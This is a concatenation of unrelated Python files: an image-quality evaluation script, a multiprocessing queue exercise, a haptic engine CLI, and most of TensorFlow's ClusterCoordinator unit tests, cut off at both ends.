# real_cpdb = cpbd_compute(real_paths[inx])
fake_cpdb = cpbd_compute(fake_paths[inx])
# r_cpdb.append(real_cpdb)
f_cpdb.append(fake_cpdb)
dis_txt.write(fake_paths[inx] + '\t fake: {:.4f}'.format( fake_cpdb) + '\n')
# average_r = sum(r_cpdb) / len(r_cpdb)
average_f = sum(f_cpdb) / len(f_cpdb)
print "Aeverage: \t fake: {:.4f}".format( average_f)
return average_f
def main(config):
# _sample( config)
get_pickle(config)
# get_pickle_xface('/u/lchen63/data/mat/test.csv', config)
# get_pickle_yousaidthat('/u/lchen63/data/mat/test_yousaidthat.csv', config)
p = os.path.join( config.pickle_path,'{}.pkl'.format(config.model_name))
# average_ssim, average_psnr = compare_ssim(p)
#generate_landmarks(p)
# average_f = compare_cpdb(p)
compare_landmarks(os.path.join(config.sample_dir ,'landmark/'), config)
# print "Aeverage: \t fake: {:.4f}".format( average_f)
# print "Aeverage: \t ssim: {:.4f},\t psnr: {:.4f}".format( average_ssim, average_psnr)
if __name__ == "__main__":
config = parse_args()
config.sample_dir = os.path.join(config.sample_dir, config.model_name)
# config.pickle_path = os.path.join(config.pickle_path, config.model_name)
main(config)
|
13_exercise_19.py
|
# -*- coding: utf-8 -*-
from multiprocessing import Process, Queue
import os, time, random
# Code executed by the writer process:
def write(q):
print('Process to write: %s' % os.getpid())
for value in ['A', 'B', 'C']:
print('Put %s to queue...' % value)
q.put(value)
time.sleep(random.random())
# Code executed by the reader process:
def read(q):
print('Process to read: %s' % os.getpid())
while True:
value = q.get(True)
print('Get %s from queue.' % value)
if __name__=='__main__':
# The parent process creates the Queue and passes it to each child process:
q = Queue()
pw = Process(target=write, args=(q,))
pr = Process(target=read, args=(q,))
# Start the writer child process pw:
pw.start()
# Start the reader child process pr:
pr.start()
# Wait for pw to finish:
pw.join()
# pr runs an infinite loop and can never finish on its own, so terminate it forcibly:
pr.terminate()
|
hapticenginge_interface.py
|
#!/usr/bin/python3
import argparse
import os
import sys
myfolder = os.path.dirname(os.path.abspath(__file__))
lib_path = os.path.join(myfolder, "../lib/")
sys.path.append(lib_path)
import haptic_engine_core
import subprocess
import time
import threading
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--up", action='store_true', help="HapticEngine UP signal")
parser.add_argument("-d", "--down", action='store_true', help="HapticEngine DOWN signal")
parser.add_argument("-s", "--soft", action='store_true', help="HapticEngine SOFT signal")
parser.add_argument("-t", "--tap", action='store_true', help="HapticEngine TAP signal")
parser.add_argument("-dt", "--doubletap", action='store_true', help="HapticEngine DoubleTAP signal")
parser.add_argument("-sn", "--snooze", action='store_true', help="HapticEngine SNOOZE signal")
args = parser.parse_args()
up = args.up
down = args.down
soft = args.soft
tap = args.tap
doubletap = args.doubletap
snooze = args.snooze
hapt = None
def init_haptic_engine_object():
global hapt
hapt = haptic_engine_core.HapticEngine()
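# Fires each requested haptic effect on its own thread so that several effects
# can be triggered without blocking the caller.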
def run_interface(option=None):
if up or option == "up":
th = threading.Thread(target=hapt.UP)
th.start()
if down or option == "down":
th = threading.Thread(target=hapt.DOWN)
th.start()
if soft or option == "soft":
th = threading.Thread(target=hapt.SOFT)
th.start()
if tap or option == "tap":
th = threading.Thread(target=hapt.TAP)
th.start()
if doubletap or option == "doubletap":
th = threading.Thread(target=hapt.DoubleTAP)
th.start()
if snooze or option == "snooze":
th = threading.Thread(target=hapt.SNOOZE)
th.start()
init_haptic_engine_object()
if __name__ == "__main__":
run_interface()
|
cluster_coordinator_test.py
|
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for coordinator.py."""
import collections
import contextlib
import functools
import gc
import os
import platform
import sys
import threading
import time
import traceback
from absl.testing import parameterized
from tensorflow.python.compat import v2_compat
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.distribute import distribute_utils
from tensorflow.python.distribute import distribution_strategy_context
from tensorflow.python.distribute import input_lib
from tensorflow.python.distribute import multi_worker_test_base
from tensorflow.python.distribute import parameter_server_strategy_v2
from tensorflow.python.distribute.cluster_resolver import SimpleClusterResolver
from tensorflow.python.distribute.coordinator import cluster_coordinator as coordinator_lib
from tensorflow.python.distribute.coordinator import values as values_lib
from tensorflow.python.eager import cancellation
from tensorflow.python.eager import def_function
from tensorflow.python.eager import test
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import tensor_spec
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import coordinator
from tensorflow.python.training.server_lib import ClusterSpec
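# Thin test helper around coordinator_lib.Closure that eagerly builds its output
# RemoteValue so the tests below can inspect closure results and errors.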
class ClosureWithOutput(coordinator_lib.Closure):
def __init__(self, function, cancellation_mgr=None, args=None, kwargs=None):
super(ClosureWithOutput, self).__init__(
function, cancellation_mgr=cancellation_mgr, args=args, kwargs=kwargs)
self.output_remote_value = self.build_output_remote_value()
class CoordinatedClosureQueueTest(test.TestCase):
def testBasic(self):
queue = coordinator_lib._CoordinatedClosureQueue()
closure1 = self._create_closure(queue._cancellation_mgr)
queue.put(closure1)
self.assertIs(closure1, queue.get())
self.assertFalse(queue.done())
queue.put_back(closure1)
self.assertEqual(closure1, queue.get())
queue.mark_finished()
self.assertTrue(queue.done())
queue.wait()
def testProcessAtLeastOnce(self):
closure_queue = coordinator_lib._CoordinatedClosureQueue()
labels = ['A', 'B', 'C', 'D', 'E']
processed_count = collections.defaultdict(int)
coord = coordinator.Coordinator(clean_stop_exception_types=[])
def process_queue():
with coord.stop_on_exception():
has_been_put_back = False
while True:
closure = closure_queue.get(timeout=30)
if closure is None:
break
if not has_been_put_back:
has_been_put_back = True
closure_queue.put_back(closure)
continue
closure._function()
closure_queue.mark_finished()
def get_func(label):
def func():
time.sleep(3)
processed_count[label] += 1
return func
cm = cancellation.CancellationManager()
for label in labels:
closure_queue.put(ClosureWithOutput(get_func(label), cm))
t1 = threading.Thread(target=process_queue, daemon=True)
t1.start()
t2 = threading.Thread(target=process_queue, daemon=True)
t2.start()
# Make sure multiple wait() calls are fine.
closure_queue.wait()
closure_queue.wait()
closure_queue.wait()
closure_queue.wait()
self.assertEqual(processed_count, collections.Counter(labels))
coord.join([t1, t2])
def testNotifyBeforeWait(self):
closure_queue = coordinator_lib._CoordinatedClosureQueue()
def func():
logging.info('func running')
coord = coordinator.Coordinator(clean_stop_exception_types=[])
def process_queue():
with coord.stop_on_exception():
closure_queue.get()
closure_queue.mark_finished()
closure_queue.put(ClosureWithOutput(func, closure_queue._cancellation_mgr))
t = threading.Thread(target=process_queue)
t.start()
coord.join([t])
# This test asserts that waiting at the time the function has been processed
# doesn't time out.
closure_queue.wait()
def _assert_one_unblock_the_other(self, first_fn, second_fn):
"""Asserts `second_fn` wouldn't return before `first_fn` is finished."""
first_fn_done = threading.Event()
second_fn_done = threading.Event()
coord = coordinator.Coordinator(clean_stop_exception_types=[])
def wrapped_first_fn():
with coord.stop_on_exception():
self.assertFalse(second_fn_done.is_set())
first_fn()
first_fn_done.set()
self.assertFalse(first_fn_done.is_set())
t = threading.Thread(target=wrapped_first_fn)
t.start()
second_fn()
self.assertTrue(first_fn_done.is_set())
second_fn_done.set()
coord.join([t])
def testWaitRaiseErrorAfterMarkFailure(self):
if sys.version_info >= (3, 8) and platform.system() == 'Windows':
# TODO(b/165013260): Fix this
self.skipTest('Test is currently broken on Windows with Python 3.8')
closure_queue = coordinator_lib._CoordinatedClosureQueue()
closure_queue.put(self._create_closure(closure_queue._cancellation_mgr))
closure = closure_queue.get()
wait_finish_event = threading.Event()
coord = coordinator.Coordinator(clean_stop_exception_types=[])
# Using a thread to verify that closure_queue.wait() will not return until
# all inflight closures are finished.
def mark_finished_fn():
try:
raise ValueError('Some error.')
except ValueError as e:
closure_queue.mark_failed(e)
def wait_fn():
with self.assertRaises(ValueError):
closure_queue.wait()
self._assert_one_unblock_the_other(mark_finished_fn, wait_fn)
self.assertTrue(closure_queue.done())
def _create_closure(self, cancellation_mgr):
@def_function.function()
def some_function():
return 1.0
return ClosureWithOutput(some_function, cancellation_mgr)
def _put_two_closures_and_get_one(self):
closure_queue = coordinator_lib._CoordinatedClosureQueue()
closure1 = self._create_closure(closure_queue._cancellation_mgr)
closure_queue.put(closure1)
closure2 = self._create_closure(closure_queue._cancellation_mgr)
closure_queue.put(closure2)
closure_got = closure_queue.get() # returns closure1
self.assertIs(closure_got, closure1)
self.assertIsNot(closure_got, closure2)
return closure_queue, closure1, closure2
def testPutRaiseError(self):
if sys.version_info >= (3, 8) and platform.system() == 'Windows':
# TODO(b/165013260): Fix this
self.skipTest('Test is currently broken on Windows with Python 3.8')
closure_queue, _, closure2 = self._put_two_closures_and_get_one()
closure_queue.mark_failed(ValueError())
with self.assertRaises(ValueError):
closure_queue.put(self._create_closure(closure_queue._cancellation_mgr))
self.assertTrue(closure_queue.done())
with self.assertRaisesRegex(
errors.CancelledError,
'The corresponding function is cancelled. Please reschedule the '
'function.'):
closure2.output_remote_value.fetch()
# The error is cleared.
closure_queue.put(self._create_closure(closure_queue._cancellation_mgr))
def testWaitRaiseError(self):
if sys.version_info >= (3, 8) and platform.system() == 'Windows':
# TODO(b/165013260): Fix this
self.skipTest('Test is currently broken on Windows with Python 3.8')
closure_queue, _, closure2 = self._put_two_closures_and_get_one()
closure_queue.mark_failed(ValueError())
with self.assertRaises(ValueError):
closure_queue.wait()
self.assertTrue(closure_queue.done())
with self.assertRaisesRegex(
errors.CancelledError,
'The corresponding function is cancelled. Please reschedule the '
'function.'):
closure2.output_remote_value.fetch()
# The error is cleared.
closure_queue.wait()
def testDoneRaiseError(self):
if sys.version_info >= (3, 8) and platform.system() == 'Windows':
# TODO(b/165013260): Fix this
self.skipTest('Test is currently broken on Windows with Python 3.8')
closure_queue, _, _ = self._put_two_closures_and_get_one()
self.assertFalse(closure_queue.done())
closure_queue.mark_failed(ValueError())
with self.assertRaises(ValueError):
closure_queue.done()
def _set_error(self, closure_queue, closure, error):
try:
raise error
except Exception as e: # pylint: disable=broad-except
closure.output_remote_value._set_error(e)
closure_queue.mark_failed(e)
def _test_cancel_closure_when_error(self, call_wait):
if sys.version_info >= (3, 8) and platform.system() == 'Windows':
# TODO(b/165013260): Fix this
self.skipTest('Test is currently broken on Windows with Python 3.8')
closure_queue, closure1, closure2 = self._put_two_closures_and_get_one()
closure_queue.put(self._create_closure(closure_queue._cancellation_mgr))
closure_queue.get()
# At this moment, there are two inflight, one in queue.
self.assertEqual(closure_queue._inflight_closure_count, 2)
# Hold a copy of the queue's cancellation manager at this point
initial_cm = closure_queue._cancellation_mgr
# Simulating closure1 fails.
self._set_error(closure_queue, closure1, ValueError('Some error.'))
# At this moment, there are one inflight, one in queue.
self.assertEqual(closure_queue._queue.qsize(), 1)
self.assertEqual(closure_queue._inflight_closure_count, 1)
closure3 = self._create_closure(closure_queue._cancellation_mgr)
def fake_cancellation():
self._set_error(closure_queue, closure2,
ValueError('Fake cancellation error.'))
def report_error():
# It should not report the fake cancellation error.
with self.assertRaisesRegex(ValueError, 'Some error.'):
# Verifying `wait()` or `put()` raises even if one closure is in
# flight.
if call_wait:
closure_queue.wait()
else:
closure_queue.put(closure3)
self._assert_one_unblock_the_other(fake_cancellation, report_error)
# The original cancellation manager of the queue has been cancelled.
self.assertTrue(initial_cm.is_cancelled)
# At this moment, there is zero inflight, nothing in queue.
self.assertTrue(closure_queue._queue.empty())
self.assertEqual(closure_queue._inflight_closure_count, 0)
self.assertIsNone(closure_queue._error)
# This asserts that closure1 has errored.
with self.assertRaisesRegex(ValueError, 'Some error.'):
closure1.output_remote_value.fetch()
# The following asserts that closure3 should have been cancelled.
if not call_wait:
with self.assertRaisesRegex(
errors.CancelledError,
'The corresponding function is cancelled. Please reschedule the '
'function.'):
closure3.output_remote_value.fetch()
# Closure2 was an inflight closure when it got cancelled.
self.assertEqual(closure2.output_remote_value._status,
values_lib.RemoteValueStatus.READY)
with self.assertRaisesRegex(ValueError, 'Fake cancellation error.'):
closure2.output_remote_value.fetch()
# This asserts that the queue has a clear state.
self.testBasic()
def testWaitRaiseErrorAfterCancelClosure(self):
self._test_cancel_closure_when_error(call_wait=True)
def testPutRaiseErrorAfterCancelClosure(self):
self._test_cancel_closure_when_error(call_wait=False)
def testStateIsRestoredAfterJoinIsCalled(self):
if sys.version_info >= (3, 8) and platform.system() == 'Windows':
# TODO(b/165013260): Fix this
self.skipTest('Test is currently broken on Windows with Python 3.8')
closure_queue, _, _ = self._put_two_closures_and_get_one()
self.assertEqual(closure_queue._inflight_closure_count, 1)
closure_queue.mark_failed(ValueError('test error'))
with self.assertRaises(ValueError):
closure_queue.put(self._create_closure(closure_queue._cancellation_mgr))
# Its error should have been cleared.
self.assertIsNone(closure_queue._error)
closure_queue.put(self._create_closure(closure_queue._cancellation_mgr))
self.assertIsNone(closure_queue._error)
def testThreadSafety(self):
thread_count = 10
queue = coordinator_lib._CoordinatedClosureQueue()
# Each thread performs 20 queue actions: 10 are `put_back` and 10 are
# `mark_finished`.
action_count = 20
def func():
for i in range(action_count):
closure = queue.get()
if i % 2 == 0:
queue.put_back(closure)
else:
queue.mark_finished()
threads = [threading.Thread(target=func) for i in range(thread_count)]
for t in threads:
t.start()
for _ in range(thread_count * action_count // 2):
queue.put(self._create_closure(queue._cancellation_mgr))
queue.wait()
self.assertTrue(queue.done())
class ErrorReportingThread(threading.Thread):
error = None
def __init__(self, *args, **kwargs):
assert 'target' in kwargs
target = kwargs['target']
@functools.wraps(target)
def wrapped_target(*args, **kwargs):
try:
return target(*args, **kwargs)
except Exception as e: # pylint: disable=broad-except
traceback.print_exception(*sys.exc_info())
ErrorReportingThread.error = e
kwargs['target'] = wrapped_target
super(ErrorReportingThread, self).__init__(*args, **kwargs)
class TestCaseWithErrorReportingThread(test.TestCase):
@classmethod
def setUpClass(cls):
cls._threading_thread = threading.Thread
threading.Thread = ErrorReportingThread
super(TestCaseWithErrorReportingThread, cls).setUpClass()
@classmethod
def tearDownClass(cls):
super(TestCaseWithErrorReportingThread, cls).tearDownClass()
threading.Thread = cls._threading_thread
def setUp(self):
ErrorReportingThread.error = None
super(TestCaseWithErrorReportingThread, self).setUp()
def tearDown(self):
super(TestCaseWithErrorReportingThread, self).tearDown()
if ErrorReportingThread.error:
raise ErrorReportingThread.error # pylint: disable=raising-bad-type
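# Starts an in-process cluster (workers, parameter servers and a chief), wraps it
# in ParameterServerStrategyV2 and returns a ClusterCoordinator for that strategy.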
def make_coordinator(num_workers, num_ps):
# TODO(rchao): Test the internal rpc_layer version.
cluster_def = multi_worker_test_base.create_in_process_cluster(
num_workers=num_workers, num_ps=num_ps, rpc_layer='grpc')
cluster_def['chief'] = [
'localhost:%d' % multi_worker_test_base.pick_unused_port()
]
cluster_resolver = SimpleClusterResolver(
ClusterSpec(cluster_def), rpc_layer='grpc')
strategy = parameter_server_strategy_v2.ParameterServerStrategyV2(
cluster_resolver)
return coordinator_lib.ClusterCoordinator(strategy)
class ClusterCoordinatorTest(TestCaseWithErrorReportingThread,
parameterized.TestCase):
@classmethod
def setUpClass(cls):
super(ClusterCoordinatorTest, cls).setUpClass()
cls.coordinator = make_coordinator(num_workers=5, num_ps=2)
cls.strategy = cls.coordinator.strategy
def testClusterCoordinatorOnlyInitOnce(self):
cluster = self.coordinator._cluster
same_coordinator = coordinator_lib.ClusterCoordinator(self.strategy)
self.assertIs(self.coordinator, same_coordinator)
self.assertIs(cluster, same_coordinator._cluster)
def testFnReturnNestedValues(self):
x = constant_op.constant(1)
@def_function.function
def f():
return x + 1, (x + 2, x + 3), [x + 4], {'v': x}
got = self.coordinator.schedule(f)
want = 2, (3, 4), [5], {'v': 1}
self.assertEqual(got.fetch(), want)
self.assertEqual(self.coordinator.fetch(got), want)
def testFetchingRemoteValueStructure(self):
self.skipTest('b/171040359: flaky test')
x = constant_op.constant(1)
@def_function.function
def f():
return x + 1, (x + 2, x + 3), [x + 4], {'v': x}
want = 2, (3, 4), [5], {'v': 1}
remote_value_list = [self.coordinator.schedule(f) for _ in range(5)]
self.assertAllEqual(
self.coordinator.fetch(remote_value_list), [want for _ in range(5)])
def testInputFunction(self):
def input_fn():
return dataset_ops.DatasetV2.range(1, 2)
with self.strategy.scope():
v = variables.Variable(initial_value=0, dtype=dtypes.int64)
@def_function.function
def worker_fn(iterator):
x = next(iterator)
v.assign_add(x)
return x
distributed_dataset = self.coordinator.create_per_worker_dataset(input_fn)
result = self.coordinator.schedule(
worker_fn, args=(iter(distributed_dataset),))
result = self.coordinator.fetch(result)
self.assertEqual(result, (1,))
result = self.coordinator.schedule(
worker_fn, args=(iter(distributed_dataset),))
result = self.coordinator.fetch(result)
self.assertEqual(result, (1,))
self.assertAlmostEqual(v.read_value(), 2, delta=1e-6)
def testAsyncScheduleAndJoin(self):
if test_util.is_xla_enabled():
self.skipTest('Assign_add is not deterministic across threads in XLA')
def input_fn():
return dataset_ops.DatasetV2.from_tensor_slices([2] * 10)
with self.strategy.scope():
v = variables.Variable(initial_value=0, dtype=dtypes.int32)
# TODO(yuefengz): the following tf.function has a return value which is None
# in its structured_outputs.
@def_function.function
def worker_fn(iterator):
x = next(iterator)
v.assign_add(x)
distributed_dataset = self.coordinator.create_per_worker_dataset(input_fn)
iterator = iter(distributed_dataset)
# Verifying joining without any scheduling doesn't hang.
self.coordinator.join()
self.assertEqual(v.read_value().numpy(), 0)
for _ in range(5):
self.coordinator.schedule(worker_fn, args=(iterator,))
self.coordinator.join()
# With 5 addition it should be 2*5 = 10.
self.assertEqual(v.read_value().numpy(), 10)
for _ in range(5):
self.coordinator.schedule(worker_fn, args=(iterator,))
# Verifying multiple join is fine.
self.coordinator.join()
self.coordinator.join()
self.coordinator.join()
self.assertTrue(self.coordinator.done())
# Likewise, it's now 20.
self.assertEqual(v.read_value().numpy(), 20.)
@parameterized.parameters(True, False)
def testInputFunctionWithMap(self, use_input_fn):
self._map_fn_tracing_count = 0
def input_fn():
def map_fn(x):
self._map_fn_tracing_count += 1
return x + 10
return dataset_ops.DatasetV2.range(0, 10).map(map_fn)
@def_function.function
def worker_fn(iterator):
return next(iterator)
if use_input_fn:
distributed_dataset = self.coordinator.create_per_worker_dataset(input_fn)
else:
distributed_dataset = self.coordinator.create_per_worker_dataset(
input_fn())
result = self.coordinator.schedule(
worker_fn, args=(iter(distributed_dataset),))
self.assertEqual(result.fetch(), (10,))
self.assertEqual(self._map_fn_tracing_count, 1)
def testInputFunctionCreateVariables(self):
def input_fn():
v = variables.Variable(initial_value=0.0)
return v.read_value()
with self.assertRaises(ValueError):
self.coordinator.create_per_worker_dataset(input_fn)
@parameterized.parameters(True, False)
def testDatasetsShuffledDifferently(self, use_input_fn):
# This test requires at least two workers in the cluster.
self.assertGreaterEqual(len(self.coordinator._cluster.workers), 2)
random_seed.set_random_seed(None)
def input_fn():
dataset = dataset_ops.DatasetV2.range(0, 100).shuffle(100).batch(1)
return self.strategy.experimental_distribute_dataset(dataset)
if use_input_fn:
distributed_dataset = self.coordinator.create_per_worker_dataset(input_fn)
else:
distributed_dataset = self.coordinator.create_per_worker_dataset(
input_fn())
distributed_iterator = iter(distributed_dataset)
# Get elements from the first two iterators.
iterator_1 = distributed_iterator._values[0]
iterator_1._rebuild_on(self.coordinator._cluster.workers[0])
iterator_1 = iterator_1.fetch()
elements_in_iterator_1 = [
self.strategy.experimental_local_results(e)
for e in iterator_1
]
iterator_2 = distributed_iterator._values[1]
iterator_2._rebuild_on(self.coordinator._cluster.workers[1])
iterator_2 = iterator_2.fetch()
elements_in_iterator_2 = [
self.strategy.experimental_local_results(e)
for e in iterator_2
]
self.assertNotAllEqual(elements_in_iterator_1, elements_in_iterator_2)
def testPerWorkerValue(self):
self.skipTest('b/168569314')
var_shape = tuple()
var_dtype = dtypes.float32
var_name = 'var'
def create_var():
var = variables.Variable(
initial_value=0.0, dtype=var_dtype, name=var_name)
self.assertIn('worker', var.device)
return var
worker_local_var = self.coordinator._create_per_worker_resources(create_var)
# The following is a workaround to allow `worker_local_var` to be passed in
# as args to the `coordinator.schedule` method which requires tensor specs
# to trace tf.function but _create_worker_resources' return values don't
# have tensor specs. We can get rid of this workaround once
# _create_worker_resources is able to infer the tensor spec of the return
# value of the function passed in. See b/154675763.
for var in worker_local_var._values:
var._type_spec = tensor_spec.TensorSpec(var_shape, var_dtype, var_name)
def worker_fn(var):
var.assign_add(1.0)
for _ in range(10):
# Which slice of `worker_local_var` will be used will depend on which
# worker the `worker_fn` gets scheduled on.
self.coordinator.schedule(worker_fn, args=(worker_local_var,))
self.coordinator.join()
var_sum = sum(self.coordinator.fetch(worker_local_var._values))
self.assertEqual(var_sum, 10.0)
def testDisallowRemoteValueAsInput(self):
@def_function.function
def func_0():
return 1.0
@def_function.function
def func_1(x):
return x + 1.0
remote_v = self.coordinator.schedule(func_0)
with self.assertRaises(ValueError):
self.coordinator.schedule(func_1, args=(remote_v,))
def testPythonFunctionNotAllowedToSchedule(self):
def func(a):
return array_ops.identity(a)
with self.assertRaisesRegexp(
TypeError,
'`tf.distribute.experimental.coordinator.ClusterCoordinator.schedule` '
'only accepts a `tf.function` or a concrete function.'):
self.coordinator.schedule(func, args=(1,))
def testDatasetPartiallyCreatedOnCoordinator(self):
dataset = dataset_ops.DatasetV2.range(1, 10)
@def_function.function
def input_fn():
return dataset.shuffle(9)
@def_function.function
def worker_fn(iterator):
x = next(iterator)
return x
per_worker_dataset = self.coordinator.create_per_worker_dataset(input_fn)
self.coordinator.schedule(worker_fn, args=(iter(per_worker_dataset),))
with self.assertRaisesRegexp(
coordinator_lib.InputError,
'error message is Failed copying input tensor from'):
self.coordinator.join()
def testPassDatasetToCreatePerWorkerDataset(self):
dataset = dataset_ops.DatasetV2.range(1, 11).batch(4)
@def_function.function
def worker_fn(iterator):
return next(iterator)
per_worker_dataset = self.coordinator.create_per_worker_dataset(dataset)
result = self.coordinator.schedule(
worker_fn, args=(iter(per_worker_dataset),))
result = result.fetch()
expected_result = math_ops.range(1., 5.)
self.assertAllEqual(result, (expected_result))
def testMultipleDatasets(self):
def input_fn1():
return dataset_ops.DatasetV2.range(0, 5)
def input_fn2():
return dataset_ops.DatasetV2.range(5, 10)
per_worker_dataset1 = self.coordinator.create_per_worker_dataset(input_fn1)
per_worker_iterator1 = iter(per_worker_dataset1)
per_worker_dataset2 = self.coordinator.create_per_worker_dataset(input_fn2)
per_worker_iterator2 = iter(per_worker_dataset2)
@def_function.function
def worker_fn(iterator1, iterator2):
return next(iterator1) + next(iterator2)
result = self.coordinator.schedule(
worker_fn, args=(per_worker_iterator1, per_worker_iterator2))
self.assertEqual(result.fetch(), 5.0)
per_worker_dataset3 = self.coordinator.create_per_worker_dataset(input_fn1)
per_worker_iterator3 = iter(per_worker_dataset3)
result = self.coordinator.schedule(
worker_fn, args=(per_worker_iterator3, per_worker_iterator2))
self.assertGreaterEqual(result.fetch(), 5.0)
def testRepeatedIteratorCreation(self):
def input_fn():
return dataset_ops.DatasetV2.range(1, 100)
per_worker_dataset1 = self.coordinator.create_per_worker_dataset(input_fn)
per_worker_dataset2 = self.coordinator.create_per_worker_dataset(input_fn)
@def_function.function
def worker_fn(iterator1, iterator2):
return next(iterator1) + next(iterator2)
for _ in range(10):
per_worker_iterator1 = iter(per_worker_dataset1)
per_worker_iterator2 = iter(per_worker_dataset2)
result = self.coordinator.schedule(
worker_fn, args=(per_worker_iterator1, per_worker_iterator2))
for _ in range(10):
self.coordinator.schedule(
worker_fn, args=(per_worker_iterator1, per_worker_iterator2))
self.coordinator.join()
self.assertGreaterEqual(result.fetch(), 2.0)
del per_worker_iterator1, per_worker_iterator2
gc.collect()
# There shouldn't be any live iterator objects.
for w in self.coordinator._cluster.workers:
for r in w._resource_remote_value_refs:
self.assertIsNone(r())
class LimitedClosureQueueSizeBasicTest(ClusterCoordinatorTest):
"""Test basic functionality works with explicit maximum closure queue size.
Execute the same set of test cases as in `ClusterCoordinatorTest`, with an
explicit size limit for the closure queue. Note that even when the queue size
is set to infinite, there is still a practical upper bound (depending on the host
memory limit) that can cause the queue.put operations to block when scheduling a
large number of closures on a big cluster. These tests make sure that the
coordinator does not run into deadlocks in such scenarios.
"""
@classmethod
def setUpClass(cls):
super(LimitedClosureQueueSizeBasicTest, cls).setUpClass()
coordinator_lib._CLOSURE_QUEUE_MAX_SIZE = 2
cls.coordinator = make_coordinator(num_workers=5, num_ps=2)
cls.strategy = cls.coordinator.strategy
class ScheduleStartDelayTest(ClusterCoordinatorTest):
"""Test basic functionality works with worker scheduling delay.
This is basically to make sure that setting environment variables
`TF_COORDINATOR_SCHEDULE_START_DELAY` and
`TF_COORDINATOR_SCHEDULE_START_DELAY_MAX` will not cause any failure.
"""
@classmethod
def setUpClass(cls):
super(ScheduleStartDelayTest, cls).setUpClass()
os.environ['TF_COORDINATOR_SCHEDULE_START_DELAY'] = '2'
os.environ['TF_COORDINATOR_SCHEDULE_START_DELAY_MAX'] = '4'
cls.coordinator = make_coordinator(num_workers=3, num_ps=2)
cls.strategy = cls.coordinator.strategy
@classmethod
def tearDownClass(cls):
del os.environ['TF_COORDINATOR_SCHEDULE_START_DELAY']
del os.environ['TF_COORDINATOR_SCHEDULE_START_DELAY_MAX']
super(ScheduleStartDelayTest, cls).tearDownClass()
class ErrorReportingTest(TestCaseWithErrorReportingThread):
@classmethod
def setUpClass(cls):
super(ErrorReportingTest, cls).setUpClass()
cls.coordinator = make_coordinator(num_workers=3, num_ps=2)
cls.strategy = cls.coordinator.strategy
with cls.strategy.scope():
cls.iteration = variables.Variable(initial_value=0.0)
@def_function.function
def _normal_function(self):
x = random_ops.random_uniform((2, 10))
y = random_ops.random_uniform((10, 2))
self.iteration.assign_add(1.0)
return math_ops.reduce_mean(math_ops.matmul(x, y))
@def_function.function
def _error_function(self):
x = random_ops.random_uniform((2, 10))
y = random_ops.random_uniform((10, 2))
check_ops.assert_non_positive_v2(math_ops.reduce_sum(math_ops.matmul(x, y)))
self.iteration.assign_add(1.0)
return self.iteration
@def_function.function
def _long_function(self):
x = random_ops.random_uniform((1000, 1000))
for _ in math_ops.range(10000):
a = random_ops.random_uniform((1000, 1000))
b = random_ops.random_uniform((1000, 1000))
x += math_ops.matmul(a, b)
return x
def testJoinRaiseError(self):
for _ in range(3):
self.coordinator.schedule(self._normal_function)
self.coordinator.schedule(self._error_function)
with self.assertRaises(errors.InvalidArgumentError):
self.coordinator.join()
def testScheduleRaiseError(self):
for _ in range(3):
self.coordinator.schedule(self._normal_function)
self.coordinator.schedule(self._error_function)
with self.assertRaises(errors.InvalidArgumentError):
while True:
self.coordinator.schedule(self._normal_function)
def testScheduleRaiseErrorWithMultipleFailure(self):
for _ in range(3):
self.coordinator.schedule(self._normal_function)
self.coordinator.schedule(self._error_function)
with self.assertRaises(errors.InvalidArgumentError):
while True:
self.coordinator.schedule(self._error_function)
self.coordinator.join()
def testErrorWillbeCleared(self):
self.coordinator.schedule(self._error_function)
with self.assertRaises(errors.InvalidArgumentError):
self.coordinator.join()
for _ in range(3):
self.coordinator.schedule(self._normal_function)
self.coordinator.schedule(self._error_function)
with self.assertRaises(errors.InvalidArgumentError):
self.coordinator.join()
def testRemoteValueReturnError(self):
self.skipTest('TODO(b/211502459): Fix this in OSS test.')
result = self.coordinator.schedule(self._error_function)
with self.assertRaises(errors.InvalidArgumentError):
result.fetch()
# Clear the error.
with self.assertRaises(errors.InvalidArgumentError):
self.coordinator.join()
def testInputError(self):
worker_local_val = self.coordinator._create_per_worker_resources(
self._error_function)
@def_function.function
def func(x):
return x + 1
result = self.coordinator.schedule(func, args=(worker_local_val,))
with self.assertRaises(coordinator_lib.InputError):
self.coordinator.join()
with self.assertRaises(coordinator_lib.InputError):
result.fetch()
def testCancellation(self):
for _ in range(3):
self.coordinator.schedule(self._normal_function)
long_function = self.coordinator.schedule(self._long_function)
self.coordinator.schedule(self._error_function)
with self.assertRaises(errors.InvalidArgumentError):
self.coordinator.join()
with self.assertRaises(errors.CancelledError):
long_function.fetch()
for _ in range(3):
self.coordinator.schedule(self._normal_function)
self.coordinator.join()
class LimitedClosureQueueErrorTest(ErrorReportingTest):
"""Test error reporting works with explicit maximum closure queue size.
Execute the same set of test cases as in ErrorReportingTest, with an explicit
size limit for the closure queue.
"""
@classmethod
def setUpClass(cls):
super(LimitedClosureQueueErrorTest, cls).setUpClass()
coordinator_lib._CLOSURE_QUEUE_MAX_SIZE = 2
cls.coordinator = make_coordinator(num_workers=3, num_ps=2)
cls.strategy = cls.coordinator.strategy
with cls.coordinator.strategy.scope():
cls.iteration = variables.Variable(initial_value=0.0)
class StrategyIntegrationTest(test.TestCase, parameterized.TestCase):
@classmethod
def setUpClass(cls):
super(StrategyIntegrationTest, cls).setUpClass()
cls.coordinator = make_coordinator(num_workers=1, num_ps=1)
cls.strategy = cls.coordinator.strategy
def testRunNotUsedWithClusterCoordinatorSchedule(self):
@def_function.function
def input_fn():
return dataset_ops.DatasetV2.range(1, 3)
with self.strategy.scope():
v = variables.Variable(initial_value=1, dtype=dtypes.int64)
def replica_fn(input_tensor):
